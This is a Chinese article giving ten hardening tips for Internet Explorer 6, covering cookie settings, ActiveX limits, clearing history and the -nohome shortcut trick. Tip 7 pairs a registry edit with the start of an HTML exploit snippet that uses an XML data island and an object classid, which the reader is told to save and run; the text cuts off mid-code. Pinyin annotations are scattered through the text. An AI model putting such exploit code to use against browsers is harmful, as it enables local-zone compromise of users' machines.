針對(duì)IE的惡意修改、攻擊方法非常多，本文中介紹的十種反黑技巧，一定會(huì)對(duì)你有所幫助。

　　1.管理好Cookie

　　在IE6.0中，打開“工具”→“Internet選項(xiàng)”→“隱私”對(duì)話框，這里設(shè)定了“阻止所有Cookie”、“高”、“中高”、“中”、“低”、“接受所有Cookie”六個(gè)級(jí)別（默認(rèn)為“中”），你只要拖動(dòng)滑塊就可以方便地進(jìn)行設(shè)定，而點(diǎn)擊下方的“編輯”按鈕，在“網(wǎng)站地址”中輸入特定的網(wǎng)址，就可以將其設(shè)定為允許或拒絕它們使用Cookie。

　　2.禁用或限制使用Java程序及ActiveX控件

　　在網(wǎng)頁中經(jīng)常使用Java、Java Applet、ActiveX編寫的腳本，它們可能會(huì)獲取你的用戶標(biāo)識(shí)、IP地址，乃至口令，甚至?xí)谀愕臋C(jī)器上安裝某些程序或進(jìn)行其他操作，因此應(yīng)對(duì)Java、Java小程序腳本、ActiveX控件和插件的使用進(jìn)行限制。打開“Internet選項(xiàng)”→“安全”→“自定義級(jí)別”，就可以設(shè)置“ActiveX控件和插件”、“Java”、“腳本”、“下載”、“用戶驗(yàn)證”以及其它安全選項(xiàng)。對(duì)于一些不太安全的控件或插件以及下載操作，應(yīng)該予以禁止、限制，至少要進(jìn)行提示。

　　3.防止泄露自己的信息

　　缺省條件下，用戶在第一次使用Web地址、表單、表單的用戶名和密碼后，同意保存密碼，在下一次再進(jìn)入同樣的Web頁及輸入密碼時(shí)，只需輸入開頭部分，后面的就會(huì)自動(dòng)完成，給用戶帶來了方便，但同時(shí)也留下了安全隱患，不過我們可以通過調(diào)整“自動(dòng)完成”功能的設(shè)置來解決。設(shè)置方法如下：依次點(diǎn)擊“Internet選項(xiàng)”→“內(nèi)容”→“自動(dòng)完成”，打開“自動(dòng)完成設(shè)置”對(duì)話框，選中要使用的“自動(dòng)完成”復(fù)選項(xiàng)。

　　提醒：為發(fā)安全起見，防止泄露自己的一些信息，應(yīng)該定期清除歷史記錄，方法是在“自動(dòng)完成設(shè)置”對(duì)話框中點(diǎn)擊“清除表單”和“清除密碼”按鈕。

　　4.清除已瀏覽過的網(wǎng)址

　　在“Internet選項(xiàng)”對(duì)話框中的“常規(guī)”標(biāo)簽下單擊歷史記錄區(qū)域的“清除歷史記錄”按鈕即可。若只想清除部分記錄，單擊IE工具欄上的“歷史”按鈕，在左欄的地址歷史記錄中，找到希望清除的地址或其下網(wǎng)頁，單擊鼠標(biāo)右鍵，從彈出的快捷菜單中選取“刪除”。

　　5.清除已訪問過的網(wǎng)頁

　　為了加快瀏覽速度，IE會(huì)自動(dòng)把你瀏覽過的網(wǎng)頁保存在緩存文件夾“C：/Windows/Temporary Internet Files”下。當(dāng)你確認(rèn)不再需要瀏覽過的網(wǎng)頁時(shí)，在此選中所有網(wǎng)頁，刪除即可?；蛘咴?#8220;Internet選項(xiàng)”的“常規(guī)”標(biāo)簽下單擊“Internet臨時(shí)文件”項(xiàng)目中的“刪除文件”按鈕，在打開的“刪除文件”對(duì)話框中選中“刪除所有脫機(jī)內(nèi)容”，單擊“確定”，這種方法會(huì)遺留少許Cookie在文件夾內(nèi)，為此IE6.0在“刪除文件”按鈕旁邊增加了一個(gè)“刪除Cookie”的按鈕，通過它可以很方便地刪除遺留的Cookie。

　　6.永遠(yuǎn)不怕IE主頁地址被修改

　　眾所周知，修改IE默認(rèn)主頁地址是惡意網(wǎng)頁常用的一招。IE被修改后，會(huì)自動(dòng)連接到惡意網(wǎng)頁的地址。大家常用的方法是修改注冊(cè)表，其實(shí)，只要簡單給IE加個(gè)參數(shù)，就再也不害怕IE主頁地址被修改了。下面是具體的方法和步驟。

　　首先，打開“我的電腦”，找到IE的安裝目錄，這里假設(shè)你的IE安裝在C：\Program Files\Internet Explorer下。進(jìn)入該文件夾，找到Iexplore.exe文件，對(duì)著它點(diǎn)擊鼠標(biāo)右鍵，在彈出的快捷菜單中選擇“發(fā)送到→桌面快捷方式”，這樣就在桌面上建立了一個(gè)Iexplore.exe文件的快捷方式。如果你夠仔細(xì)的話，你會(huì)發(fā)現(xiàn)你建立的這個(gè)快捷方式名字為“Iexplore.exe”，而桌面上原來的IE快捷方式名字為“Internet Explorer”，兩者不僅名字不相同，而且“內(nèi)涵”也不盡相同。

　　繼續(xù)我們的工作，用鼠標(biāo)右鍵單擊該快捷方式，選擇“屬性”，會(huì)彈出“Iexplore.exe 屬性”對(duì)話框，選擇其中的“快捷方式”標(biāo)簽，然后在“目標(biāo)”框里填入："C：\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome，給Iexplore.exe加上參數(shù)“-nohome”，輸入時(shí)請(qǐng)大家注意在參數(shù)“-nohome”前面有一個(gè)空格，不要忘了。點(diǎn)擊“確定”退出即可。

　　這樣即使主頁被修改也沒有關(guān)系，打開IE就是一片空白，就連about：blank也不顯示。而且這樣能夠加快啟動(dòng)速度，一點(diǎn)IE窗口馬上就出蹦來了。

　　對(duì)于IE在安裝時(shí)自己建立的快捷方式，我們無法為它加上上述參數(shù)。如果不信可以試試，用鼠標(biāo)右鍵點(diǎn)擊桌面上原來IE自建的快捷方式，選“屬性”，會(huì)發(fā)現(xiàn)“目標(biāo)”欄、“起始位置”欄、“快捷鍵”欄和“運(yùn)行方式”欄都是灰色不可選取狀態(tài)。這就是它們之間最大的不同！也是本文的關(guān)鍵所在。

　　7.挖出IE本地安全配置選項(xiàng)

　　在IE中可以通過點(diǎn)擊“工具→Internet選項(xiàng)→安全”來設(shè)定電腦安全等級(jí)，之后會(huì)出現(xiàn)如圖所示窗口（圖3）。從圖中可以看出，在安全性設(shè)定中我們只能設(shè)定Internet、本地Intranet、受信任的站點(diǎn)、受限制的站點(diǎn)。不過，慣于隱藏其部分功能的微軟（真不知微軟是怎么想的，老和我們玩“捉迷藏”游戲），在這里又留了一手：其實(shí)這里還有一個(gè)隱藏的選項(xiàng)——就是“我的電腦”的安全性設(shè)定，如果你想看到它，可以通過修改注冊(cè)表的方法來達(dá)到目的。

　　下面是具體的方法：打開“開始”菜單中的“運(yùn)行”，在彈出的“運(yùn)行”對(duì)話框中輸入Regedit.exe，打開注冊(cè)表編輯器，點(diǎn)擊前面的“+”號(hào)順次展開到：HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0，在右邊窗口中找到DWORD值“Flags”，默認(rèn)鍵值為十六進(jìn)制的21（十進(jìn)制33），雙擊“Flags”，在彈出的對(duì)話框中將它的鍵值改為“1”即可，關(guān)閉注冊(cè)表編輯器。無需重新啟動(dòng)電腦，重新打開IE，再次點(diǎn)擊“工具→Internet選項(xiàng)→安全”標(biāo)簽，你就會(huì)看到多了一個(gè)“我的電腦”圖標(biāo)，在這里你可以對(duì)IE的本地安全進(jìn)行配置。

　　這個(gè)小技巧有什么用呢？把下面的代碼保存為一個(gè)html文件，然后運(yùn)行試試就知道了：

　　注意：請(qǐng)把&lt；替換為向左的尖括號(hào)，把&gt；替換為向右的尖括號(hào)。

　　&lt；span datasrc="#oExec" datafld="exploit" dataformatas="html"&gt；&lt；/span&gt；

　　&lt；xml id="oExec"&gt；

　　&lt；security&gt；

　　&lt；exploit&gt；

　　&lt；！[CDATA[

　　&lt；object id="oFile"

　　classid="clsid：8888
本文來自湖南陽光電子技術(shù)學(xué)校，原文地址：http://www.